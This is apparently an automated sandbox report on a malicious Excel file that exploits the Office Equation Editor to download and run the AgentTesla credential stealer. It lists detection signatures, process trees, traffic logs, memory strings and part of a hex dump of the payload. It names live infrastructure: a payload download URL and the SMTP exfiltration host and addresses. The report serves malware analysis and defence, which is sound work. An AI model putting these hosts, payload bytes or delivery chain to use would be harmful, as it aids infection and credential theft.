Play interactive tour

Edit tour

Analysis Report 0AX4532QWSA.xlsx

Overview

General Information

Sample Name:	0AX4532QWSA.xlsx
Analysis ID:	339305
MD5:	9b4eeaed62b4b0253a7a3205f771099d
SHA1:	e7340dd8904b13bf4dbf842c56479ffdb969287c
SHA256:	9bbe5843787cdc023cff31aaa88ce4b91e52e013d5e4b543323b7eea2f5f51d3
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains potential unpacker

Binary contains a suspicious time stamp

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2528 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 72B76DB11728DD92AA4C3CB45F155B05)

vbc.exe (PID: 960 cmdline: {path} MD5: 72B76DB11728DD92AA4C3CB45F155B05)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "oloyeboos@outlook.com", "ByHost: ": "mail.gammavilla.org:587", "Password: ": "", "From: ": "info@gammavilla.org"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2688	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 960	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 191.96.149.225, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://191.96.149.225/new.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: vbc.exe.960.5.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "oloyeboos@outlook.com", "ByHost: ": "mail.gammavilla.org:587", "Password: ": "", "From: ": "info@gammavilla.org"}

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00329FDDh
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00329FDDh

Source: global traffic

DNS query: name: mail.gammavilla.org

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 19:42:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Wed, 13 Jan 2021 16:41:58 GMTETag: "c6400-5b8cad158905f"Accept-Ranges: bytesContent-Length: 812032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 99 b4 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5a 0c 00 00 08 00 00 00 00 00 00 8e 79 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 79 0c 00 4f 00 00 00 00 80 0c 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0c 00 0c 00 00 00 20 79 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 59 0c 00 00 20 00 00 00 5a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 80 0c 00 00 06 00 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0c 00 00 02 00 00 00 62 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 79 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 ca 00 00 5c 80 00 00 03 00 00 00 4b 00 00 06 40 4b 01 00 e0 2d 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 42 00 00 00 01 00 00 11 00 73 15 00 00 0a 0a 06 16 16 02 28 16 00 00 0a 0b 12 01 28 17 00 00 0a 02 28 16 00 00 0a 0b 12 01 28 18 00 00 0a 6f 19 00 00 0a 00 02 06 73 1a 00 00 0a 28 1b 00 00 0a 00 02 03 28 1c 00 00 0a 00 2a 22 02 28 1d 00 00 0a 00 2a 00 1b 30 05 00 07 01 00 00 02 00 00 11 00 16 0a 00 72 01 00 00 70 0b 07 28 1e 00 00 0a 0d 09 39 e0 00 00 00 00 07 19 17 19 73 1f 00 00 0a 13 04 11 04 73 20 00 00 0a 13 05 00 38 9f 00 00 00 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 06 11 06 16 9a 6f 22 00 00 0a 72 69 00 00 70 28 23 00 00 0a 13 07 11 07 2c 71 00 11 06 17 9a 6f 22 00 00 0a 02 28 23 00 00 0a 13 08 11 08 2c 5a 00 2b 3a 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 09 11 09 16 9a 6f 22 00 00 0a 72 7b 00 00 70 28 23 00 00 0a 13 0a 11 0a 2c 0c 11 09 17 9a 12 00 28 24 00 00 0a 26 00 11 05 6f 25 00 00 0a 25 0c 72 87 00 00 70 6f 26 00 00

Source: Joe Sandbox View

IP Address: 217.174.152.38 217.174.152.38

Source: Joe Sandbox View	ASN Name: TELEPOINTBG TELEPOINTBG
Source: Joe Sandbox View	ASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587

Source: global traffic

HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 191.96.149.225Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5384863.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: mail.gammavilla.org

Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.5.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2370524978.0000000006280000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2368238555.00000000007FC000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000005.00000003.2257055628.000000000634D000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000003.2257073132.00000000062F0000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://gammavilla.org
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://mail.gammavilla.org
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2371956308.0000000007B00000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\Public\vbc.exe

Windows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe

Source: C:\Users\Public\vbc.exe

Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: protected documents the yellow above 25 26 27 28 29 30 31 32 33 34 35 36 37 38 " " " "

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003200E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00322528
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00323551
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0032B544
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00324598
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00327738
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00328BEA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00322518
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0032ADA6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00326AF0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003276F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003242E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00329F60
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00329F68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01147138
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01142F28
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01146C78
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007814F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00780747
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00780A38
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007814E8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00780758
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA36FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAA898
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAEA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CACFB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAAD50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA9D08
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA70D8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA6A90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAD6A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAA278
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA5FC8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA8DA8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAE368
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA8A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F40F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F4C30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F4450
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FD060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F95B8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FE115
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FC938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F86C0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F5A08
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F8F90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F9320
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F9B5A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F8378
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAC83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA8C9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FACC8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB0EC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F40E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB01A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F5003
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAC3E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB05F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F4440
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F507C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA98F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FADAD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F9B5A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA9D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB1C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FADF2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA90E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAD0D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB134
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA94A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB17C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAD68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAAA5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAEC1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAAEA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FE23B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAE37
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FCE30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB62D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FCA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAE7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAA60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAF90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FABB2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAFD5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAF06
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAB2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAF4B

Source: 0AX4532QWSA.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: new[1].exe.2.dr

